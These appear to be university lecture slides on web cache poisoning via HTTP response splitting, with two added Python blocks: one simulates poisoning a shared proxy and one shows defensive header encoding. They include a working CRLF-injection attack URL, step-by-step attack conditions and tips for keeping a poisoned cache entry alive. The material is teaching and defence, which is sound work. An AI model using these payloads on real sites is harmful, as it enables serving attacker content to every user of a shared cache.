
Cache Poisoning

alexandra.lacatus@info.uaic.ro FCS Iasi, Software Security

Overview

- Intro
- Web cache poisoning
- Related attacks
- About HTTP response splitting
- Attack scenario
- Practical considerations

Software Security, FCS Iasi, 2013-2014

About web cache poisoning

- The field was pioneered by Amit Klein, formerly Director of Security and Research at Sanctum, Inc.
- The attack allows an attacker to place malicious content on a shared cache server (such as a proxy server).
- All users of that cache keep receiving the malicious content until the cache entry is purged.


Related attacks and vulnerabilities

- Web cache poisoning is built on HTTP response splitting: the attacker must first find a web resource vulnerable to HTTP response splitting and exploit that vulnerability.
- Cross-user defacement is also possible: malicious web content is served to a specific user, and sensitive information can be stolen from that user.


HTTP response splitting

- Forcing an originator of HTTP messages to emit two (or more) valid (RFC-compliant) messages instead of one.
- The result of an application's failure to reject illegal user input: malicious or unexpected CR and LF characters end up in response headers, especially Location and Set-Cookie.


Response splitting example [5]

JSP page (say http://www.the.site/welcome.jsp?lang=...):

<%
response.sendRedirect("/by_lang.jsp?lang=" + request.getParameter("lang"));
%>

Normal request:

http://www.the.site/welcome.jsp?lang=Romanian

Normal response:

HTTP/1.0 302 Redirect
Location: http://www.the.site/by_lang.jsp?lang=Romanian
Connection: Keep-Alive
Content-Length: 0


Example continued [5]

Attack request (the lang parameter carries CR/LF pairs, URL-encoded as %0d%0a):

http://www.the.site/welcome.jsp?lang=Foo%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2020%0d%0a%0d%0a<html>Gotcha!</html>

Response (actually, two responses and some change):

HTTP/1.0 302 Redirect
Location: http://www.the.site/by_lang.jsp?lang=Foo
Connection: Keep-Alive
Content-Length: 0

-> Will be interpreted as response #1 (the Connection and Content-Length headers here were supplied by the attacker inside the lang value)

HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 20

<html>Gotcha!</html>

-> Will be interpreted as response #2 (injected by the attacker!)

Connection: Keep-Alive
Content-Length: 0

-> Superfluous data: the server's own trailing headers, which no longer conform to the HTTP standard

Cache poisoning attack

Difficult to carry out in a real environment (many conditions and prerequisites):

1) Find a web resource vulnerable to HTTP response splitting.
2) Force the cache server to flush the current cache entry for the target resource (Pragma: no-cache or Cache-Control headers in the request).
3) Send a specially crafted request, as in the previous example.
4) Send the next request, for the resource to be poisoned, on the same connection. The injected response #2, which the server emitted while answering the request from step 3, is taken by the cache as the answer to this request and is stored by the shared web cache server under the poisoned resource.
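The splitting example and the four attack steps above, as an added illustration that is not part of the original slides. The origin behaves like the slide's JSP (the lang value is copied verbatim into Location), the attack parameter is the slide's one, and the proxy, its "cache any 200 response" policy and the /index.html victim path are assumptions made here: a simple proxy splits the origin's byte stream into messages by Content-Length and pairs them with pipelined requests in arrival order, which is exactly what lets response #2 be stored under the next request.

```python
from urllib.parse import unquote

# Constructed to match the slide's attack request; the proxy, its cache policy
# and the /index.html victim path are assumptions for this illustration.
ATTACK_PARAM = (
    "Foo%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%200%0d%0a%0d%0a"
    "HTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
    "Content-Length:%2020%0d%0a%0d%0a<html>Gotcha!</html>"
)
VICTIM_PATH = "/index.html"


def vulnerable_redirect(lang: str) -> bytes:
    """Origin behaviour of the slide's JSP: the decoded lang parameter is copied
    verbatim into the Location header, CR/LF included."""
    return (
        b"HTTP/1.0 302 Redirect\r\n"
        b"Location: http://www.the.site/by_lang.jsp?lang=" + lang.encode("latin-1") + b"\r\n"
        b"Connection: Keep-Alive\r\n"
        b"Content-Length: 0\r\n"
        b"\r\n"
    )


def origin_index() -> bytes:
    """The genuine /index.html the origin serves (constructed sample page)."""
    body = b"<html>Welcome</html>"
    return (b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)


def parse_responses(stream: bytes) -> list:
    """Cut a byte stream into HTTP messages the way a simple proxy does: status
    line and headers up to the first blank line, then exactly Content-Length
    bytes of body. A chunk that does not begin with an HTTP status line is kept
    and flagged invalid, so the desynchronisation stays visible."""
    messages = []
    while stream:
        head, sep, rest = stream.partition(b"\r\n\r\n")
        if not sep:  # truncated: no end of headers
            messages.append({"valid": False, "status": head.decode("latin-1"),
                             "headers": {}, "body": b""})
            break
        lines = head.decode("latin-1").split("\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body, stream = rest[:length], rest[length:]
        messages.append({"valid": lines[0].startswith("HTTP/"),
                         "status": lines[0], "headers": headers, "body": body})
    return messages


def poison_shared_cache() -> tuple:
    """Steps 3 and 4 of the slide on one keep-alive connection through a shared
    proxy: the splitting request, then a request for VICTIM_PATH. The proxy
    pairs responses with requests in arrival order, so the smuggled response #2
    is cached under VICTIM_PATH and the origin's real answer is left over."""
    requests = ["/welcome.jsp?lang=" + ATTACK_PARAM, VICTIM_PATH]
    # Everything the origin writes back for the two requests, in order.
    wire = vulnerable_redirect(unquote(ATTACK_PARAM)) + origin_index()
    responses = parse_responses(wire)
    cache = {}
    for path, resp in zip(requests, responses):
        if resp["valid"] and resp["status"].split(" ")[1] == "200":
            cache[path] = resp["body"]  # assumed policy: cache any 200 response
    leftover = responses[len(requests):]  # desynchronised messages, never paired
    return cache, leftover


if __name__ == "__main__":
    for i, m in enumerate(parse_responses(vulnerable_redirect(unquote(ATTACK_PARAM))), 1):
        print(f"message {i}: valid={m['valid']} status={m['status']!r} body={m['body']!r}")
    print("cache after attack:", poison_shared_cache()[0])
```

Running it prints three messages for the single attack request (the 302, the injected 200 with `<html>Gotcha!</html>`, and the invalid trailing headers), and a cache holding the attacker's page under /index.html while the origin's real /index.html response is stranded as a leftover message. The parser deliberately trusts Content-Length and the message boundary the same way a naive proxy does; that trust is the whole reason the attack works.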

Attacker: practical aspects [4]

- Maintain the poisoned resource:
  - a Last-Modified header with a future time value helps keep the poisoned entry from being replaced when the cache revalidates it
  - or resend the cache poisoning attack every x minutes
- Execute all requests immediately one after another
- Take into account the URI length (GET vs POST)
- The attack scenario depends on the web server implementation (Microsoft ASP, Jakarta Tomcat, IBM WebSphere etc.): where does the second message start?

Victims: practical aspects [4]

Web application developers
- VALIDATE INPUT! Remove CRs and LFs before embedding data in HTTP response headers (Location and Set-Cookie especially).

Web application engine vendors
- Disallow CR and LF characters in all HTTP response headers (as RFC 2616 requires).

Proxy vendors
- Avoid sharing a server TCP connection among different clients / virtual hosts.
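The developer-side fix above, as an added example that is not part of the original slides: a hardened equivalent of the `response.sendRedirect("/by_lang.jsp?lang=" + ...)` call from the splitting example, plus a Set-Cookie builder. The function names, the `HeaderInjection` exception and the choice to reject (rather than strip) control characters are assumptions made here; the two ideas are the slide's own, encode data that belongs in a URL so CR/LF can never end the header line, and refuse any header value that still contains a control character.

```python
import re
from urllib.parse import quote

# Added example, not from the slides. Names are assumptions for illustration.
_CTL = re.compile(r"[\x00-\x1f\x7f]")  # CR, LF and every other ASCII control


class HeaderInjection(ValueError):
    """Raised instead of emitting a header value that would split the response."""


def safe_header_value(value: str) -> str:
    """Last line of defence: reject, never silently emit, control characters."""
    if _CTL.search(value):
        raise HeaderInjection("control character in header value")
    return value


def build_redirect(lang: str) -> bytes:
    """Hardened equivalent of response.sendRedirect("/by_lang.jsp?lang=" + lang):
    the parameter is percent-encoded (CR/LF become %0D%0A), so whatever the
    attacker sent stays inside the URL instead of ending the header line."""
    location = "http://www.the.site/by_lang.jsp?lang=" + quote(lang, safe="")
    return (b"HTTP/1.0 302 Redirect\r\nLocation: "
            + safe_header_value(location).encode("ascii")
            + b"\r\nContent-Length: 0\r\n\r\n")


def set_cookie_header(name: str, value: str) -> bytes:
    """A cookie value is not a URL, so it is checked and the response fails
    loudly rather than carrying the attacker's CRLF into the header block."""
    return b"Set-Cookie: " + safe_header_value(f"{name}={value}").encode("ascii")


if __name__ == "__main__":
    # Constructed attack value: the decoded form of the slide's lang parameter, shortened.
    evil = "Foo\r\nContent-Length: 0\r\n\r\nHTTP/1.0 200 OK\r\n\r\n<html>Gotcha!</html>"
    print(build_redirect(evil).decode())
    try:
        set_cookie_header("lang", evil)
    except HeaderInjection as e:
        print("rejected:", e)
```

With the attack value, `build_redirect` now emits a single response whose Location header contains `Foo%0D%0AContent-Length...`, i.e. one header line and one message; `set_cookie_header` raises instead of writing a second Set-Cookie line. Rejecting is preferable to stripping because a value that was meant to carry CR/LF is never legitimate input for a header.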



Bibliography

1) OWASP page for Web cache poisoning: https://www.owasp.org/index.php/Cache_Poisoning
2) OWASP page for HTTP Response Splitting: https://www.owasp.org/index.php/HTTP_Response_Splitting
3) OWASP Testing Guide v3 (section 4.8.15, Testing for HTTP Splitting/Smuggling, pages 278-281)
4) Amit Klein, HTTP Response Splitting, Web Cache Poisoning Attacks and Related Topics
5) Amit Klein, HTTP Message Splitting, Smuggling and Other Animals, OWASP AppSec Europe, 2006
6) China's Great Firewall spreads overseas: http://www.computerworld.com/s/article/9174132/China_s_Great_Firewall_spreads_overseas

